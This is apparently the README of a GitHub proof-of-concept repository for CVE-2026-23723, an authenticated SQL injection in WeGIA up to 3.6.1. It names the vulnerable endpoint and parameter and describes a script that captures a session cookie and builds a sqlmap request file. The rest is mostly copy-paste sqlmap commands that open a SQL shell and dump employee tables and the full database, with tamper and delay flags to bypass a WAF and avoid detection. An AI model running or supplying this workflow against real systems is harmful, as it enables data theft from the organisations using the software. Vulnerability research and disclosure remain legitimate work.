# CVE-2026-23723 PoC - WeGIA Authenticated SQL Injection Exploit Helper

**Authenticated Error-Based SQL Injection in WeGIA ≤ 3.6.1**  
**GHSA-xfmp-2hf9-gfjp** | [Official Advisory](https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-xfmp-2hf9-gfjp)

**POC Original Author / Reporter**: [ViniCastro2001](https://github.com/ViniCastro2001)
**GHSA Published by**: nilsonLazarin (project maintainer)

This lightweight Python script automates:
- Login to WeGIA system using provided credentials
- Extraction of valid PHP session cookie
- Generation of sqlmap-compatible request file (injection point marked as `id_memorando=1*`)
- Output of ready-to-run sqlmap commands for enumeration, interactive shell, and data dumping

### Features
- Tries multiple common login paths and form field names for better compatibility
- Generates sqlmap request file (.req)
- Provides copy-paste sqlmap commands for:
  - Interactive MySQL-like shell (`--sql-shell`)
  - Database / table enumeration
  - Targeted table dump or full database dump

### Requirements
- Python 3.x
- `requests` library (most penetration testing environments already have it)
- [sqlmap](https://github.com/sqlmapproject/sqlmap) installed and in your PATH

### Installation
```bash
git clone https://github.com/Ch35h1r3c47/CVE-2026-23723-POC.git
cd CVE-2026-23723-POC
```

### Usage
```bash
# Recommended: interactive password prompt
python CVE-2026-23723.py --url http://target.com -u admin

# Provide password directly
python CVE-2026-23723.py --url http://target.com -u admin -p wegia

# Custom output file
python CVE-2026-23723.py --url http://target.com -u admin -p wegia --output custom.req
```

After running successfully, the script will:

Attempt login
Generate wegia_sqlmap.req (or your custom file name)
Display ready-to-use sqlmap commands

### Example generated commands:
```bash
# 1. Interactive MySQL-like shell (most recommended)
sqlmap -r wegia_sqlmap.req --sql-shell --batch --dbms=mariadb

# 2. Show current & all databases
sqlmap -r wegia_sqlmap.req --current-db --dbs --batch

# 3. List tables in wegia database
sqlmap -r wegia_sqlmap.req -D wegia --tables --batch

# 4. Dump a specific table (example: funcionario)
sqlmap -r wegia_sqlmap.req -D wegia -T funcionario --dump --threads=2 --batch

# 5. Dump entire wegia database (careful!)
sqlmap -r wegia_sqlmap.req -D wegia --dump-all --threads=3 --batch --output-dir=./dump
Optional sqlmap flags:

--proxy=http://127.0.0.1:8080 (through Burp/ZAP)
--tamper=space2comment,randomcase (basic WAF bypass)
--delay=1 (slow down to avoid detection)
```

If Automatic Login Fails
Manually log in via browser → copy full Cookie header → run sqlmap directly:

```bash
sqlmap -u "http://target.com/controle/control.php?nomeClasse=Atendido_ocorrenciaControle&metodo=listarTodosComAnexo&id_memorando=*" \
  --cookie="PHPSESSID=xxxxxxxx; other_cookie=yyy" \
  --sql-shell --batch
```

Legal Disclaimer
This PoC is provided for educational and authorized penetration testing purposes only.
Unauthorized use against any system is illegal and prohibited.
The author and contributors assume no responsibility for misuse or any damage caused.
References

GHSA-xfmp-2hf9-gfjp
CVE-2026-23723
